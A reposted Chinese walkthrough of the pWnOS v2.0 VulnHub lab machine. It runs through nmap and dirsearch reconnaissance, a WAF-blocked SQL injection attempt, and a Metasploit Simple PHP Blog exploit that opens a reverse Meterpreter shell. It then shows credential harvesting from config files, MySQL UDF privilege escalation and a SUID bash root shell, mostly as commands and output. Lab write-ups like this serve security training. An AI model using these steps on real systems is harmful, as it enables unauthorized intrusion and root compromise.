[vulnhub] pWnOS v2.0

https://www.vulnhub.com/entry/pwnos-20-pre-release,34/

主机发现端口扫描

  1. 探测存活主机,150为靶机

    nmap -sP 192.168.75.0/24
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 12:44 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00013s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00015s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.150
    Host is up (0.00030s latency).
    MAC Address: 00:0C:29:5D:85:45 (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00010s latency).
    MAC Address: 00:50:56:FB:E7:F4 (VMware)
    Nmap scan report for 192.168.75.131
    Host is up.
    
  2. 扫描主机所有端口

    nmap -sT -min-rate 10000 -p- 192.168.75.150   
    //                 
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 12:48 CST
    Nmap scan report for 192.168.75.150
    Host is up (0.00027s latency).
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    MAC Address: 00:0C:29:5D:85:45 (VMware)
    
  3. 扫描服务版本及系统版本

    nmap -sT -sV -O -p22,80  192.168.75.150 
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 12:49 CST
    Nmap scan report for 192.168.75.150
    Host is up (0.00046s latency).PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
    80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
    MAC Address: 00:0C:29:5D:85:45 (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6
    OS details: Linux 2.6.32 - 2.6.39
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
  4. 扫描漏洞

    nmap -script=vuln -p22,80  192.168.75.150 
    //
    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 12:50 CST
    Nmap scan report for 192.168.75.150
    Host is up (0.00044s latency).PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    | http-cookie-flags: 
    |   /: 
    |     PHPSESSID: 
    |       httponly flag not set
    |   /login.php: 
    |     PHPSESSID: 
    |       httponly flag not set
    |   /login/: 
    |     PHPSESSID: 
    |       httponly flag not set
    |   /index/: 
    |     PHPSESSID: 
    |       httponly flag not set
    |   /register/: 
    |     PHPSESSID: 
    |_      httponly flag not set
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    | http-csrf: 
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.150
    |   Found the following possible CSRF vulnerabilities: 
    |     
    |     Path: http://192.168.75.150:80/login.php
    |     Form id: 
    |     Form action: login.php
    |     
    |     Path: http://192.168.75.150:80/register.php
    |     Form id: 
    |_    Form action: register.php
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-enum: 
    |   /blog/: Blog
    |   /login.php: Possible admin folder
    |   /login/: Login page
    |   /info.php: Possible information file
    |   /icons/: Potentially interesting folder w/ directory listing
    |   /includes/: Potentially interesting directory w/ listing on 'apache/2.2.17 (ubuntu)'
    |   /index/: Potentially interesting folder
    |   /info/: Potentially interesting folder
    |_  /register/: Potentially interesting folder
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    MAC Address: 00:0C:29:5D:85:45 (VMware)
    

    难得发现疑似csrf ,但在靶机上用处好像不大,还发现了一些可能感兴趣的路径

web渗透

  1. 扫描目录

    dirsearch -u 192.168.75.150 -x 403
    [13:08:27] Starting:                                                                                                            
    [13:08:36] 302 -   20B  - /activate  ->  http://10.10.10.100/index.php      
    [13:08:48] 301 -  248B  - /blog  ->  http://192.168.75.150/blog/            
    [13:08:49] 200 -    2KB - /blog/                                            
    [13:09:01] 301 -  251B  - /includes  ->  http://192.168.75.150/includes/    
    [13:09:01] 200 -  546B  - /includes/
    [13:09:02] 200 -    9KB - /info                                             
    [13:09:02] 200 -    9KB - /info.php
    [13:09:05] 200 -  629B  - /login                                            
    [13:09:05] 200 -  629B  - /login.php                                        
    [13:09:05] 200 -  629B  - /login/super                                      
    [13:09:05] 200 -  629B  - /login/                                           
    [13:09:05] 200 -  629B  - /login/cpanel.aspx                                
    [13:09:05] 200 -  629B  - /login/admin/
    [13:09:05] 200 -  629B  - /login/cpanel.php
    [13:09:05] 200 -  629B  - /login/cpanel.js
    [13:09:05] 200 -  629B  - /login/cpanel.html
    [13:09:05] 200 -  629B  - /login/login
    [13:09:05] 200 -  629B  - /login/oauth/                                     
    [13:09:05] 200 -  629B  - /login/admin/admin.asp                            
    [13:09:05] 200 -  629B  - /login/cpanel.jsp                                 
    [13:09:05] 200 -  629B  - /login/index
    [13:09:05] 200 -  629B  - /login/administrator/                             
    [13:09:05] 200 -  629B  - /login/cpanel/
    [13:09:18] 200 -  723B  - /register.php                                     
    [13:09:18] 200 -  723B  - /register            
    
  2. 访问敏感目录

    • /blog/ blog博客页面
    • /blog/login.php blog登陆页面
    • /info.php phpinfo

    都是注册或者登陆界面

  3. /index.php泄露了管理员邮箱尝试弱密码爆破admin@isints.com ,爆破失败

    • /login.php界面尝试sql注入,在**Email Address** 后面加' 爆出sql语句

      admin@isints.com'
      
      An error occurred in script '/var/www/login.php' on line 47: Query: SELECT * FROM users WHERE email='admin@isints.com'' AND pass='356a192b7913b04c54574d18c28d46e6395428ab' AND active IS NULL 
      
    • 加上#号闭合语句让语句为真

      email=admin@isints.com'#&pass=1&submit=Login&submitted=TRUE
      

      提示:WAF: SQL Injection Attack Detected. Details Logged. Denying Session. Goodbye! 被WAF阻止了,换路子

  4. 尝试寻找/blog/ 的漏洞

    • 打开F12,看看能不能查到是什么CMS,找到 Simple PHP Blog 0.4.0 可能就是CMS的名称

    • 网上查阅Simple PHP Blog 0.4.0 的漏洞

      敏感文件泄露:https://github.com/advisories/GHSA-p35h-cp5r-m46j ,在/blog/config/ 泄露了password.txt 获得密码 $1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/ 使用 hash-identifier 识别不到

    • 使用msf查找是否存在漏洞

      msf6 > search simple php blog
      //
      Matching Modules
      ================#  Name                                      Disclosure Date  Rank       Check  Description-  ----                                      ---------------  ----       -----  -----------0  exploit/unix/webapp/sphpblog_file_upload  2005-08-25       excellent  Yes    Simple PHP Blog Remote Command Execution
      

      存在,使用该exploit模块

      msf6 > use exploit/unix/webapp/sphpblog_file_upload //使用该模块
      [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
      msf6 exploit(unix/webapp/sphpblog_file_upload) > show options //查看该模块需要配置什么Module options (exploit/unix/webapp/sphpblog_file_upload):Name     Current Setting  Required  Description----     ---------------  --------  -----------Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT    80               yes       The target port (TCP)SSL      false            no        Negotiate SSL/TLS for outgoing connectionsURI      /sphpblog        yes       Sphpblog directory pathVHOST                     no        HTTP server virtual hostPayload options (php/meterpreter/reverse_tcp):Name   Current Setting  Required  Description----   ---------------  --------  -----------LHOST  192.168.75.151   yes       The listen address (an interface may be specified)LPORT  4444             yes       The listen portExploit target:Id  Name--  ----0   AutomaticView the full module info with the info, or info -d command.msf6 exploit(unix/webapp/sphpblog_file_upload) > set rhosts 192.168.75.150 //靶机ip
      rhosts => 192.168.75.150
      msf6 exploit(unix/webapp/sphpblog_file_upload) > set rport 80  //靶机端口
      rport => 80
      msf6 exploit(unix/webapp/sphpblog_file_upload) > set uri /blog/ //攻击目录
      uri => /blog/
      msf6 exploit(unix/webapp/sphpblog_file_upload) > exploit //启动攻击[*] Started reverse TCP handler on 192.168.75.151:4444 
      [+] Successfully retrieved hash: $1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/
      [+] Successfully removed /config/password.txt
      [+] Successfully created temporary account.
      [+] Successfully logged in as OTmoxq:ykM0Fg
      [+] Successfully retrieved cookie: ii9ppvao0fveedft2314so41u3
      [+] Successfully uploaded pVmL1BgOJLbmlN8mucTA.php
      [+] Successfully uploaded gy904amvE6YvJp3W7xkC.php
      [+] Successfully reset original password hash.
      [+] Successfully removed /images/pVmL1BgOJLbmlN8mucTA.php
      [*] Calling payload: /images/gy904amvE6YvJp3W7xkC.php
      [*] Sending stage (39927 bytes) to 192.168.75.150
      [*] Meterpreter session 1 opened (192.168.75.151:4444 -> 192.168.75.150:42500) at 2024-09-24 18:01:33 +0800
      [+] Successfully removed /images/gy904amvE6YvJp3W7xkC.php
      meterpreter > 
      

      攻击成功,输入shell以获得靶机shell

      meterpreter > shell
      Process 1680 created.
      Channel 0 created.
      sh: getcwd() failed: No such file or directory
      sh: getcwd() failed: No such file or directorypython -c "import pty;pty.spawn('/bin/bash')" //获得交互性更好的shell
      shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
      www-data@web:$ 
      

      获得www-datashell

提权

  1. 查看权限

    www-data@web:$ whoami
    www-data
    //
    www-data@web:$ uname -a
    Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
    //
    www-data@web:$ ip a
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host loinet6 ::1/128 scope host valid_lft forever preferred_lft forever
    2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000link/ether 00:0c:29:5d:85:45 brd ff:ff:ff:ff:ff:ffinet 192.168.75.150/24 brd 192.168.75.255 scope global eth0inet6 fe80::20c:29ff:fe5d:8545/64 scope link valid_lft forever preferred_lft forever
    //
    www-data@web:$ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    
  2. 信息收集

    • 获取数据库连接配置文件,获得数据库用户root,密码goodday

      www-data@web:/var/www$ cat mysqli_connect.php 
      <?php # Script 8.2 - mysqli_connect.php// This file contains the database access information.
      // This file also establishes a connection to MySQL
      // and selects the database.// Set the database access information as constants:DEFINE ('DB_USER', 'root');
      DEFINE ('DB_PASSWORD', 'goodday');
      DEFINE ('DB_HOST', 'localhost');
      DEFINE ('DB_NAME', 'ch16');// Make the connection:$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
      
    • 尝试登录,登陆失败,继续寻找mysql连接配置文件

      根据上面发现的连接配置的文件来寻找

      www-data@web:/var/www$ find / -name '*mysqli_connect*' 2>/dev/null
      /var/mysqli_connect.php
      /var/www/mysqli_connect.php
      
      www-data@web:/var/www$ cat /var/mysqli_connect.php 
      <?php # Script 8.2 - mysqli_connect.php// This file contains the database access information.
      // This file also establishes a connection to MySQL
      // and selects the database.
      // Set the database access information as constants:DEFINE ('DB_USER', 'root');
      DEFINE ('DB_PASSWORD', 'root@ISIntS');
      DEFINE ('DB_HOST', 'localhost');
      DEFINE ('DB_NAME', 'ch16');// Make the connection:
      $dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
      ?>
      

      获得密码root@ISIntS ,尝试登陆成功

    • 查询数据,发现一个用户Dan ,尝试ssh登录

      mysql> select * from users;
      select * from users;
      +---------+------------+-----------+------------------+------------------------------------------+------------+----------------------------------+---------------------+
      | user_id | first_name | last_name | email            | pass                                     | user_level | active                           | registration_date   |
      +---------+------------+-----------+------------------+------------------------------------------+------------+----------------------------------+---------------------+
      |       1 | Dan        | Privett   | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af |          0 | NULL                             | 2011-05-07 17:27:01 |
      +---------+------------+-----------+------------------+------------------------------------------+------------+----------------------------------+---------------------+
      2 rows in set (0.00 sec)
      
    • 破译密码得:killerbeesareflying ,ssh尝试登陆失败,密码是错的

    • 因为我们有数据库root权限,所以可以尝试UDF提权

      查看secure_priv权限 ,符合要求

      mysql> SHOW VARIABLES LIKE "secure_file_priv";
      SHOW VARIABLES LIKE "secure_file_priv";
      +------------------+-------+
      | Variable_name    | Value |
      +------------------+-------+
      | secure_file_priv |       |
      +------------------+-------+
      

      查看plugin路径,存放在 /usr/lib/mysql/plugin

      mysql> show variables like '%plugin%';                
      show variables like '%plugin%';
      +---------------+-----------------------+
      | Variable_name | Value                 |
      +---------------+-----------------------+
      | plugin_dir    | /usr/lib/mysql/plugin |
      +---------------+-----------------------+
      

      动态链接库存放在kali 的/usr/share/metasploit-framework/data/exploits/mysql 下,将动态链接库文件传到靶机的/tmp文件夹

      cd /usr/share/metasploit-framework/data/exploits/mysql
      // 选择版本传到靶机
      lib_mysqludf_sys_32.dll  
      lib_mysqludf_sys_64.dll
      lib_mysqludf_sys_32.so   
      lib_mysqludf_sys_64.so
      

      将动态链接库传入到plugin路径

      mysql> use mysql;mysql> create table foo(line blob);
      Query OK, 0 rows affected (0.00 sec)mysql> insert into foo values (load_file('/tmp/lib_mysqludf_sys_64.so'))
      Query OK, 1 row affected (0.00 sec)mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/udf.so';
      Query OK, 1 row affected (0.00 sec)mysql> create function sys_eval returns string soname 'udf.so';
      Query OK, 0 rows affected (0.00 sec)mysql> select * from mysql.func; 
      +----------+-----+--------+----------+
      | name     | ret | dl     | type     |
      +----------+-----+--------+----------+
      | sys_eval |   2 | udf.so | function |
      +----------+-----+--------+----------+mysql> select sys_eval('whoami'); // 函数存在root函数
      +--------------------+
      | sys_eval('whoami') |
      +--------------------+
      | root               |
      +--------------------+
      
  3. 提权

    • 创建用户自定义函数后,函数获得root权限,通过函数来获得rootshell

      mysql> select sys_eval('cp /bin/bash /tmp/binbash; chmod +xs /tmp/binbash');
      +---------------------------------------------------------------+
      | sys_eval('cp /bin/bash /tmp/binbash; chmod +xs /tmp/binbash') |
      +---------------------------------------------------------------+
      | NULL                                                          |
      +---------------------------------------------------------------+
      
      • cp /bin/bash /tmp/binbash:将 /bin/bash 文件复制到 /tmp 目录,并命名为 binbash
      • chmod +xs /tmp/binbash:给复制的文件 binbash 设置 SUID 位,这样当用户执行该文件时,进程将以文件拥有者(通常是 root)的权限运行。
    • 获得shell

      www-data@web:/tmp$ /tmp/binbash -p
      //
      binbash-4.2# whoam
      root
      

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/880324.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

介绍 Agent Q:迎接下一代 AI 自动化助手

引言 在科技领域&#xff0c;随着人工智能的不断进步&#xff0c;自动化工具日益成为提升效率的重要手段。今天&#xff0c;我将向大家介绍一款名为 Agent Q 的 AI 自动化助手。这款工具不仅能够完成复杂的任务&#xff0c;还支持交互式命令行操作&#xff0c;使得用户体验更为…

Linux相关概念和重要知识点(8)(操作系统、进程的概念)

1.操作系统&#xff08;OS&#xff09; &#xff08;1&#xff09;基本结构的认识 任何计算机系统都包含一个基本的程序集合&#xff0c;用于实现计算机最基本最底层的操作&#xff0c;这个软件称为操作系统。操作系统大部分使用C语言编写&#xff0c;少量使用汇编语言。 从…

利用低代码快速搭建电商小程序之商品列表页

目标&#xff1a; 搭建商城的一个商品列表页面&#xff08;先做静态页&#xff09; 开发环境&#xff1a; 访问白码低代码平台&#xff1a;https://www.bnocode.com/ 白码的新自定义页功能&#xff08;使用vue框架&#xff09; 前期准备&#xff1a; 需要先准备商品数据表…

云手机的海外原生IP有什么用?

在全球数字化进程不断加快的背景下&#xff0c;企业对网络的依赖程度日益加深。云手机作为一项创新的工具&#xff0c;正逐步成为企业优化网络结构和全球业务拓展的必备。尤其是云手机所具备的海外原生IP功能&#xff0c;为企业进入国际市场提供了独特的竞争优势。 什么是海外原…

封装一个vue3的文件上传组件(拖拽或点击选择文件)

1. 效果 选择文件后: 2. 代码 <template><divclass"drop-zone c-normal":class"{borderOutline: outline,}"dragover.preventdrop.prevent"handleDrop"click"chooseFiles"><div v-if"files.length < 1"…

并查集 (Union-Find) :从基础到优化

并查集 (Union-Find) 并查集是一种树形数据结构&#xff0c;主要用于处理不相交集合&#xff08;Disjoint Set&#xff09;的合并和查询问题。它特别适用于解决有关连通性的问题&#xff0c;比如在图论中判断两点是否在同一个连通分量中。并查集可以高效地支持以下两种操作&am…

2024年数字化转型与管理国际学术会议(DTM 2024)

目录 重要信息 大会简介 大会组委 征稿主题 论文出版 会议议程 参会方式 重要信息 大会官网&#xff1a;www.icemme.org&#xff08;点击了解大会&#xff0c;投稿等详细信息&#xff09; 大会时间&#xff1a;2024年11月22-24日 大会地点&#xff1a;中国-大连 大会…

Cloudflare为网站添加AI审计 可检查AI爬虫何时抓取和抓取频次以及直接屏蔽爬虫

网络服务提供商 Cloudflare 宣布即日起为所有网站 (包括免费托管的网站) 带来 AI 审计功能&#xff0c;该功能目前处于测试阶段&#xff0c;可以分析 AI 公司的爬虫和抓爬数据。新的 AI 审计工具 (Cloudflare AI Audit) 主要提供 AI 公司的爬虫何时到网站来抓取数据、抓取的数据…

【Rust练习】16.模式

文章题目来自&#xff1a;https://practice-zh.course.rs/pattern-match/patterns.html 1 &#x1f31f;&#x1f31f; 使用 | 可以匹配多个值, 而使用 … 可以匹配一个闭区间的数值序列 fn main() {} fn match_number(n: i32) {match n {// 匹配一个单独的值1 > println!(…

16. C++ TinyWebServer项目总结(16. 服务器调制、调试和测试)

主要包括&#xff1a; 使用 tcpdump 抓包&#xff1b;使用 gdb 调试器&#xff1b;使用压力测试工具&#xff0c;模拟现实世界中的高并发请求&#xff0c;测试服务器在高压状态下的稳定性。 最大文件描述符数 Linux 对应用进程能打开的最大文件描述符数量有两个层次的限制&a…

4. 数据结构: 对象和数组

数字、布尔值和字符串是构建数据结构的原子。不过&#xff0c;许多类型的信息需要不止一个原子。对象允许我们对值&#xff08;包括其他对象&#xff09;进行分组&#xff0c;从而构建更复杂的结构。到目前为止&#xff0c;我们所构建的程序都受到限制&#xff0c;因为它们只能…

软件设计模式——工厂模式

软件设计模式——工厂模式 文章目录 软件设计模式——工厂模式一、设计模式的认知1.1 什么是软件设计模式&#xff1a;1.2 为什么要学习设计模式&#xff1a;1.3 设计模式的分类&#xff1a; 二、工厂模式2.1 工厂模式实例&#xff1a; 一、设计模式的认知 1.1 什么是软件设计…

WordPress LearnPress插件 SQL注入复现(CVE-2024-8522)

0x01 产品描述&#xff1a; LearnPress 是一款功能强大的 WordPress LMS&#xff08;学习管理系统&#xff09;插件&#xff0c;适用于创建和销售在线课程。凭借其直观的界面和丰富的功能&#xff0c;无论您是否具备编程背景&#xff0c;都能轻松搭建起在线教育网站。学会如何使…

Java之路--瓦解逻辑控制与方法使用已是瓮中捉鳖

嗨嗨大家&#xff01;今天我们来学习逻辑运算和方法的使用~ 目录 一 逻辑控制 1 分支结构 1.1 if语句 1.2 switch 语句 2 循环结构 2.1 while 循环 2.2 for 循环 2.3 do while 循环 2.4 break 2.5 continue 3. 输出输入 二、方法的使用 1 方法定义语法 2 实参和…

网络通信——DHCP

目录 一.DHCP应用场景 二.通信过程 三.DHCP报文 四.DHCP通信原理 &#xff08;1&#xff09;租借过程 &#xff08;2&#xff09;DHCP 租期更新 &#xff08;3&#xff09;DHCP重绑定 五.一般路由器的DHCP支持两种地址池 &#xff08;1&#xff09;接口地址池 &…

进制转换,原码反码补码

正数的三码合一 1个byte8位&#xff0c;-128符号位溢出了&#xff0c;所以是1000 0000

基于Python大数据的B站热门视频的数据分析及可视化系统

作者&#xff1a;计算机学姐 开发技术&#xff1a;SpringBoot、SSM、Vue、MySQL、JSP、ElementUI、Python、小程序等&#xff0c;“文末源码”。 专栏推荐&#xff1a;前后端分离项目源码、SpringBoot项目源码、Vue项目源码、SSM项目源码 精品专栏&#xff1a;Java精选实战项目…

全连接神经网络

这里写目录标题 全连接神经网络vs前馈神经网络基于全连接神经网络的手写数字识别使用Pytorch实现纯Python实现 全连接神经网络的局限 端到端学习 深度学习有时也称为端到端机器学习&#xff08;end-to-end machine learning&#xff09;。这里所说的端到端是指从一端到另一端的…

David律所代理Jose Martin幽默水果版权首发维权,尚未TRO

案件基本情况&#xff1a;起诉时间&#xff1a;2024/9/18案件号&#xff1a;2024-cv-08484原告&#xff1a;Jose Martin原告律所&#xff1a;David起诉地&#xff1a;伊利诺伊州北部法院涉案商标/版权&#xff1a;原告品牌简介&#xff1a;西班牙的卓越艺术家Jose Martin以他非…

网络原理之IP协议(网络层)

目录 前言 什么是IP协议&#xff1f; IP协议的协议头格式 16位总长度&#xff08;字节数&#xff09; 16位标识、3位标志位和13位片偏移 8位生存时间 IP地址管理 1.动态分配IP 2.NAT机制&#xff08;网络地址转换&#xff09; NAT机制是如何工作的 NAT机制的优缺点…